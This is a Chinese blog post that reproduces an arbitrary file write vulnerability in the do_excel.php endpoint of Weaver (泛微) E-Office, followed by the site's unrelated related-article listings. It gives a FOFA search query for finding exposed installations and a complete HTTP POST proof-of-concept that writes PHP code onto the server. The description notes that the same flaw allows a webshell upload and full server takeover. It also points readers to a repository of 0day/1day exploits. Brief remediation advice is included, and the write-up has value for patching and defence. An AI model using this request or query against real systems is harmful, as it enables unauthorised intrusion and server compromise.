【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞

已于 2024-10-01 15:20:44 修改
阅读量426 收藏 7
点赞数 8
分类专栏: 漏洞复现 文章标签: php 开发语言 安全
于 2024-10-01 15:20:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/142671233
版权


》》》产品描述《《《

        泛微0-0fice是一款标准化的协同 OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

》》》漏洞描述《《《

        泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。此漏洞严重威胁系统安全,可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。

》》》搜索语句《《《

app="泛微-EOffice"


》》》漏洞复现《《《

POST /general/charge/charge_list/do_excel.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

html=<?php echo md5("1");unlink(__FILE__);?>

测试文件地址:/general/charge/charge list/excel.php
如果能解析php代码则存在漏洞

》》》修复建议《《《

1、如非必要,禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略,设置白名单访问。
3、升级产品到最新版本

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

A 八方
关注
专栏目录
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁*************...
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 978
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1171
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 476
PHP反序列化2(OC绕过.wakeup绕过)
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 732
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
基于php的医院信息管理系统
计算机学姐的博客
09-28 988
【2025最新】基于php+vue+MySQL的医院信息管理系统,前后端分离。
第168天:应急响应-ELK 日志分析系统&Yara规则&样本识别&特征提取&规则编写
最新发布
weixin_71529930的博客
09-30 695
案例一:ELK 搭建使用-导入文件&监控日志&语法筛选该软件是专业分析日志的工具,但是不支持安全软件的分析这里我是在kali中搭建的搭建参考文章:(第一篇成功,第二篇呢可能是国外的docker关闭了未成功)(本地搭建)(docker搭建)安装完成的界面三种模式选择日志上传上传文件导入命名并导入上传完成以后去查看可以根据不同类别去分类查看IP时间戳ua头这里看到呢ua头有个sqlmap直接定位搜索特征字符不是单独出现,需要在前后加上*
php基础语法
liyy614的博客
09-27 1027
PHP(Hypertext Preprocessor)是一种广泛使用的开源服务器端脚本语言,特别适合用于Web开发
PHP Session扩展默认session数据储存在哪里
sheji888的专栏
09-25 802
综上所述,PHP Session扩展默认将Session数据存储在服务器的文件系统中,每个Session对应一个文件文件名由Session ID构成。虽然这是最简单和最常见的存储方式,但根据应用的需求和性能要求,也可以将Session数据存储在数据库或内存缓存系统中。PHP Session扩展提供了多种方式来存储Session数据,但默认情况下,Session数据是存储在服务器上的。使用数据库存储Session数据可以提供更好的可伸缩性和数据安全性,但也会增加数据库的负载。
tauri中加载本地文件图片或者下载网络文件图片后存储到本地,然后通过前端页面展示
09-26 577
有一个需求是需要将本地上传的文件或者网络下载的文件存储到本地,并展示在前端页面上的。要想实现上述需求,需要三个步骤,配置相应的文件文件夹访问权限,然后将文件存储到软件的相应目录中,再从目录中加载这个资源并展示。
使用php生成图片
f897907070的博客
09-24 677
/ 替换为实际字体文件路径' //注意直接跟图片地址就好。// 替换为你的保存路径。// $text = "dfsd代发收到";// 创建一个120x40的图像。// 设置内容类型为PNG。// 设置字体文件路径。
PHP 递归遍历目录
json_li的博客
09-24 517
本篇文章主要内容为PHP 两种循环递归遍历目录的示例。
PHP视频活体检测API接口示例-视频活体检测引领身份验证新潮流
weixin_41711744的博客
09-26 771
在数字化时代,身份验证几乎是每个行业的核心环节之一。然而,传统的用户名与密码验证方式已经难以应对日益复杂的安全威胁,特别是在黑客攻击、账户盗用、虚假身份愈加猖獗的今天,安全需求不断提升。通过视频捕捉用户的动态行为,比如面部动作、眨眼、头部移动等,系统能够判断是否为真人操作。在不断创新与发展的道路上,视频活体检测接口正在重新定义身份验证的标准。它为企业带来了更高的安全保障,同时也为用户提供了便捷的服务体验。未来,视频活体检测将成为数字化时代身份认证不可或缺的一部分,成为守护信息安全与用户信任的坚实后盾。
PHP 函数
wjs2024的博客
09-25 497
PHP中,函数使用function关键字定义。一个基本的函数包括函数名称、参数(可选)和函数体。除了内置函数外,用户还可以定义自己的函数来执行特定任务。PHP函数是构建复杂应用程序的基础。通过合理地使用函数,可以创建可重用、易于维护的代码。无论是使用内置函数还是创建自己的函数,PHP都提供了强大的工具来支持各种编程任务。
2024ICPC网络赛2记录:CK
zsyzClb的博客
09-25 400
不过看到异或就知道这个异或肯定不是白给你的,大概就是用字典树,一开始我以为是把两个数组分开建字典树,后面发现要一起建,然后就想到用dp来维护。这一把我们三个人手感都很好,前六题都是一遍过,然后我又切掉了非签到的E和C,最后时间不是很多,K只想到大概字典树的思路,细节不是很懂就直接开冲,当然是没有冲出来。我们想了很多错误的思路以后才开始思考kmp,然后就想到了可以一直跳kmp,只需要把相同的合并起来,如果能匹配的就全部一起跳过,不匹配的就直接删掉,时间复杂度O(n)。看上去要求某种匹配数的个数,有点吓人。
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞。SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值